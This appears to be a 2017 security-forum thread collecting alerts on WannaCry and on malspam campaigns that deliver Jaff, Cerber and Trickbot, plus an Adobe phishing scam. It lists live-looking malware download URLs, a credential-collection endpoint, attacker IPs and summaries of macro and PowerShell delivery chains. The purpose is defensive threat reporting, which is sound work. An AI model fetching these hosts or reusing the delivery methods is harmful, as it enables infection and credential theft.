WannaCry Ransomware, Fake 'invoice' SPAM
FYI...
Indicators Associated With WannaCry Ransomware
- https://www.us-cert.gov/ncas/alerts/TA17-132A
Last revised: May 15, 2017 - "... According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours... Initial reports indicate the hacker or hacking group behind the WannaCry campaign is gaining access to enterprise servers either through Remote Desktop Protocol (RDP) compromise or through the exploitation of a critical Windows SMB vulnerability. Microsoft released a security update for the MS17-010* (link is external) vulnerability on March 14, 2017. Additionally, Microsoft released patches for Windows XP, Windows 8, and Windows Server 2003 (link is external) operating systems on May 13, 2017. According to open sources, one possible infection vector is via phishing emails...
* https://technet.microsoft.com/en-us/.../ms17-010.aspx
March 14, 2017
The WannaCry ransomware received and analyzed by US-CERT is a loader that contains an AES-encrypted DLL. During runtime, the loader writes a file to disk named “t.wry”. The malware then uses an embedded 128-bit key to decrypt this file. This DLL, which is then loaded into the parent process, is the actual Wanna Cry Ransomware responsible for encrypting the user’s files. Using this cryptographic loading method, the WannaCry DLL is never directly exposed on disk and not vulnerable to antivirus software scans...
Precautionary measures to mitigate ransomware threats include:
- Ensure anti-virus software is up-to-date.
- Implement a data back-up and recovery plan to maintain copies of sensitive or proprietary data in a separate and secure location. Backup copies of sensitive data should not be readily accessible from local networks.
- Scrutinize -links- contained in -e-mails- and do -not- open -attachments- included in unsolicited e-mails.
- Only download software – especially free software – from sites you know and trust.
- Enable automated patches for your operating system and Web browser..."
(More detail at the us-cert URL at the top of this post.)
WannaCry/WannaCrypt Ransomware Summary
- https://isc.sans.edu/diary.html?storyid=22420
2017-05-15
___
> http://blog.talosintelligence.com/20...acry.html#more
May 12, 2017 - "... Umbrella* prevents DNS resolution of the domains associated with malicious activity..."
* https://umbrella.cisco.com/
... aka 'OpenDNS' - FREE:
>> https://www.opendns.com/setupguide/#/?new=home-free
Test -after- setups: https://welcome.opendns.com/
___
Fake 'invoice' SPAM - delivers pdf attachment jaff ransomware
- https://myonlinesecurity.co.uk/more-...liver-malware/
15 May 2017 - "An email pretending to be an invoice coming from random senders with a PDF attachment that drops a malicious macro enabled word doc...
Update: confirmed as Jaff ransomware (VirusTotal 5/61*) (Payload Security**)...
Screenshot: https://myonlinesecurity.co.uk/wp-co...nt-malspam.png
... An alternative docm file that was extracted confirms it to be jaff ransomware downloads
ecuamiaflowers .com/hHGFjd encrypted txt (Payload Security[3]) (VirusTotal 13/56[4]) JoeSandbox[/5]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4...is/1494846406/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
47.91.107.213
3] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
107.180.14.32
47.91.107.213
4] https://www.virustotal.com/en/file/f...is/1494844454/
5] https://jbxcloud.joesecurity.org/analysis/271421/1/html
ecuamiaflowers .com: 107.180.14.32: https://www.virustotal.com/en/ip-add...2/information/
> https://www.virustotal.com/en/url/b5...5814/analysis/
h552terriddows .com: 47.91.107.213: https://www.virustotal.com/en/ip-add...3/information/
> https://www.virustotal.com/en/url/5c...2c85/analysis/
:fear::fear: :mad:
Fake 'invoice', 'pdf attachments' SPAM
FYI...
Fake 'invoice' SPAM - downloads Cerber ransomware
- https://myonlinesecurity.co.uk/blank...liver-malware/
16 May 2017 - "... an empty/blank email with the subject of 'Re: invoice 28769' coming or pretending to come from random companies, names and email addresses with a semi-random named zip attachment that contains another zip that in turn contains a .js file... downloads Cerber ransomware...
Screenshot: https://myonlinesecurity.co.uk/wp-co...voice28769.png
... I am reliably informed[1] that with a couple of minor fixes to correct the malware developers mistakes this downloads Cerber ransomware from
hxxp ://mdnchdbde .pw/search.php which delivers a file 1 (VirusTotal 6/59*) (Payload Security**)... 'certain that they will fix it in the next malspam run. These criminal gangs often send a small spam run out to “test the waters” and when they don’t get any expected result they double check & fix the errors ready for the next spam run.
262647732.zip: extracts to 27000_packed.zip: which in turn Extracts to: 27000.js
Current Virus total detections 0/57[3]: Payload Security[4] Joebox[5] - none of the online sandboxes managed to get any download location or malware content from the .js file... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://twitter.com/Techhelplistcom/...50538112016385
* https://www.virustotal.com/en/file/6...is/1494912080/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts (1088)
3] https://www.virustotal.com/en/file/0...is/1494910036/
4] https://www.hybrid-analysis.com/samp...ironmentId=100
5] https://jbxcloud.joesecurity.org/analysis/271922/1/html
mdnchdbde .pw: 35.163.27.202: https://www.virustotal.com/en/ip-add...2/information/
> https://www.virustotal.com/en/url/99...809c/analysis/
___
Fake 'pdf attachments' SPAM - delivers Jaff ransomware
- https://myonlinesecurity.co.uk/pdf-p...ff-ransomware/
16 May 2017 - "... series of emails with pdf attachments that drops a malicious macro enabled word doc is an email with the subject of 'Emailing: 2650032.pdf' (random numbers) pretending to come from random names at your-own-email-address that delivers Jaff ransomware...
Screenshot: https://myonlinesecurity.co.uk/wp-co...650032_pdf.png
2650032.pdf - Current Virus total detections 8/54*: Payload Security**... drops EYRCUD.docm
(VirusTotal 8/59***) (Payload Security[4])... downloads an encrypted txt file from
http ://personalizar .net/Nbiyure3 which is converted by the script to galaperidol8.exe ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8...is/1494926923/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
81.88.57.70
47.91.107.213
*** https://www.virustotal.com/en/file/4...is/1494927173/
4] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
81.88.57.70
47.91.107.213
personalizar .net: 81.88.57.70: https://www.virustotal.com/en/ip-add...0/information/
> https://www.virustotal.com/en/url/2e...74c2/analysis/
:fear::fear: :mad:
Fake 'Secure Message' SPAM, Adobe phish
FYI...
Fake 'Secure Message' SPAM - delivers trickbot
- https://myonlinesecurity.co.uk/fake-...vers-trickbot/
17 May 2017 - "An email with the subject of 'You have received a new Bankline Secure Message' pretending to come from Bankline RSA but actually coming from a look-a-like domain Bankline RSA <SecureMessage@ banklinersa .co.uk> with a malicious word doc attachment... delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-co...re-message.png
... criminals sending these have registered various domains that look like genuine bank domains. Normally there are 3 or 4 newly registered domains that imitate the bank or some message sending service that can easily be confused with a legitimate organisation in some way that send these. So far we have only found 1 domain today banklinersa .co.uk. As usual they are registered via Godaddy as registrar and for a change the emails are sent via rackspace hosting not the usual citynetwork AB in Sweden. They are currently using IP numbers 104.130.29.210, 172.99.115.203, 172.99.115.216, 172.99.115.23, 104.239.169.15, 104.130.29.243, 104.130.29.245, 172.99.115.29...
SecureMessage.doc - Current Virus total detections 4/56*. Payload Security** downloads from
http ://ocysf .org/wp-content/GktpotdC7dyTH1aoroa.png which of course is -not- an image file but a renamed .exe file that gets -renamed- to a .exe and autorun (VirusTotal 10/60***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e...is/1495019899/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
50.87.146.185
107.22.214.64
95.104.2.225
192.157.238.15
*** https://www.virustotal.com/en/file/b...is/1495019988/
ocysf .org: 50.87.146.185: https://www.virustotal.com/en/ip-add...5/information/
> https://www.virustotal.com/en/url/a2...6f8a/analysis/
___
Adobe account - Phish
- https://myonlinesecurity.co.uk/adobe...ext-data-urls/
17 May 2017 - "... 'thought this was going to be some newer malware delivery method, but it is only -phishing- for email credentials, which of course is also extremely serious and very bad.
NOTE: This phishing scam only works in Google Chrome. Internet Explorer will not open data:text/html urls and gives a 'cannot display' page message. Firefox refuses to display anything - just a white screen with the original url in the address bar...
Screenshot: https://myonlinesecurity.co.uk/wp-co...hing-email.png
This email has a genuine PDF attachment that contains a blurred out image of an invoice with the prompt to view the Secured PDF Online Document on Adobe:
> https://myonlinesecurity.co.uk/wp-co...ce1246_pdf.png
-If- you click on the blurred image you get a pop up warning about links. When you follow the link inside the pdf it sends you to http ://tiny .cc/tis7ky which immediately -redirects- to
http ://qualifiedplans .com/administrator/components/com_smartformer/plugins/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/phmho/
where it downloads/opens a data:text url that displays a web page on your computer -not- an external site looking like:
> https://myonlinesecurity.co.uk/wp-co.../timed_out.png
After you press OK you get what looks-like an Adobe Business sign in page with what looks-like a download button. I inserted the usual set of fake details & pressed download, expecting some sort of malware to appear, but no it just -bounced- me on to the genuine Adobe page while your stolen data is sent to http ://setas2016 .com/image/catalog/Katalog/files/pageConfig/PDF3/index/adobe.php
With a bit of digging around We have discovered the compete phish is also hosted on http ://setas2016 .com/image/catalog/Katalog/files/pageConfig ...
> https://myonlinesecurity.co.uk/wp-co...be_sign_in.png
The data:text/html file is available for download via Payload Security*. It is in the extracted files section named urlref_httptiny .cctis7ky ..."
* https://www.hybrid-analysis.com/samp...ironmentId=100
setas2016 .com: 87.118.140.114: https://www.virustotal.com/en/ip-add...4/information/
> https://www.virustotal.com/en/url/49...fab9/analysis/
___
ICS-ALERT-17-135-01A
Indicators Associated With WannaCry Ransomware (Update A)
> https://ics-cert.us-cert.gov/alerts/...ERT-17-135-01A
Original release date: May 15, 2017 | Last revised: May 16, 2017
"... updated alert is a follow-up to the original alert titled ICS-ALERT-17-135-01 Indicators Associated With WannaCry Ransomware that was published May 15, 2017, on the NCCIC/ICS-CERT web site..."
(More detail at the URL above.)
:fear::fear: :mad:
Fake 'receipt', 'Reminder' SPAM
FYI...
Fake 'receipt' SPAM - delivers Jaff ransomware
- https://myonlinesecurity.co.uk/more-...yments-emails/
25 May 2017 - "... emails with pdf attachments that drops a malicious macro enabled word doc is an email with various subjects along the line of 'receipt, payment, payment receipt' etc. (random numbers) pretending to come from donotreply@ random email addresses and companies that delivers Jaff ransomware...
Screenshot: https://myonlinesecurity.co.uk/wp-co...ceipt-4830.png
P4830.pdf - Current Virus total detections 12/56*. Payload Security** drops ELMIRJX.doc
(VirusTotal 4/23[3]) (Payload Security[4]) downloads an encrypted txt file from
http ://dreamybean .de/TrfHn4 which should be converted by the script to bruhadson8.exe (unfortunately payload security is showing this as a tiny data file, so something is going wrong there and there must be an anti-analysis element to the malware). There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d...is/1495710733/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
81.169.145.160
3] https://www.virustotal.com/en/file/b...is/1495710997/
4] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
81.169.145.160
dreamybean .de: 81.169.145.160: https://www.virustotal.com/en/ip-add...0/information/
> https://www.virustotal.com/en/url/6f...1cf5/analysis/
> https://www.virustotal.com/en/url/ad...75f3/analysis/
___
Fake 'Reminder' SPAM - RTF file exploits deliver malware
- https://myonlinesecurity.co.uk/fake-...liver-malware/
25 May 2017 - "... RTF files this time using the CVE-2017-0199* vulnerability that was fixed in April 2017** and again extra added protections by the May 2017 security updates***. If you haven’t got round to applying these essential patches yet, then go & do it NOW...
* https://nvd.nist.gov/vuln/detail/CVE-2017-0199
** https://portal.msrc.microsoft.com/en.../CVE-2017-0199
*** https://portal.msrc.microsoft.com/en...a-000d3a32fc99
... email with the subject of '2nd Reminder Final Demand – Notice of Legal Intention' pretending to come from creditcontrol@ bookatable .com with a malicious word doc attachment eventually delivers sharik/smoke loader after a convoluted download system involving .hta files and PowerShell...
Screenshot: https://myonlinesecurity.co.uk/wp-co...able-email.png
294616_05152017.rtf - Current Virus total detections 28/57[1]. Payload Security[2] downloads an HTA file from
http :// 185.162.8.231 :64646/logo.doc (VirusTotal 0/57[3]) which in turn uses powershell to download
http :// 185.162.8.231 :64646/00001.exe (VirusTotal 48/59[4]) (Payload Security[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustotal.com/en/file/c...is/1494977406/
2] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
185.162.8.231: https://www.virustotal.com/en/ip-add...1/information/
> https://www.virustotal.com/en/url/e8...fd1a/analysis/
> https://www.virustotal.com/en/url/24...55f4/analysis/
3] https://www.virustotal.com/en/file/d...is/1494854940/
4] https://www.virustotal.com/en/file/5...is/1495445391/
5] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
185.141.25.27
193.104.215.58
:fear::fear: :mad:
Fake 'documents', 'Notification' SPAM
FYI...
Fake 'documents' SPAM - xls attachment delivers malware
- https://myonlinesecurity.co.uk/docum...known-malware/
30 May 2017 - "An email with the subject of 'documents' pretending to come from random senders with a malicious word doc or Excel XLS spreadsheet attachment delivers malware... Some subjects in this malspam campaign include ...
inv. payment
documents
Screenshot: https://myonlinesecurity.co.uk/wp-co...ent-austin.png
61759684.xls - Current Virus total detections 6/56*: Payload Security** wasn’t able to decode or decrypt the macro but a very quick & easy manual examination shows downloads from
http ://cautiousvirus .com/mbtrf.exe (VirusTotal 7/60[3]) (Payload Security[4])... The macro in the xls document is trivially encoded by using reverse strings... Opening the XLS attachment gives this -fake- invoice:
> https://myonlinesecurity.co.uk/wp-co...759684_xls.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5...is/1496135720/
** https://www.hybrid-analysis.com/samp...ironmentId=100
3] https://www.virustotal.com/en/file/2...f973/analysis/
4] https://www.hybrid-analysis.com/samp...ironmentId=100
cautiousvirus .com: 54.91.240.28: https://www.virustotal.com/en/ip-add...8/information/
> https://www.virustotal.com/en/url/38...12c0/analysis/
___
Fake 'Notification' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-...ivers-malware/
30 May 2017 - "An email with the subject of 'Notification of direct debit of fees' pretending to come from HM Land Registry but actually coming from a look-alike domain... with a malicious word doc attachment... -spoof- of a well known company, bank or public authority delivering malware...
Screenshot: https://myonlinesecurity.co.uk/wp-co...it-of-fees.png
Opening the word doc (in protected mode where it is safe) gives this which tries to convince you it is genuine:
> https://myonlinesecurity.co.uk/wp-co...gistry-doc.png
apl053017_045894595.doc - Current Virus total detections 5/56*. Payload Security** shows a download from
http ://200.7.105.13 /jpon13.exe (VirusTotal 7/60***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/2...is/1496147244/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
200.7.105.13
184.87.218.172
185.141.25.27
*** https://www.virustotal.com/en/file/7...is/1496137829/
200.7.105.13: https://www.virustotal.com/en/ip-add...3/information/
> https://www.virustotal.com/en/url/58...37cb/analysis/
:fear::fear: :mad: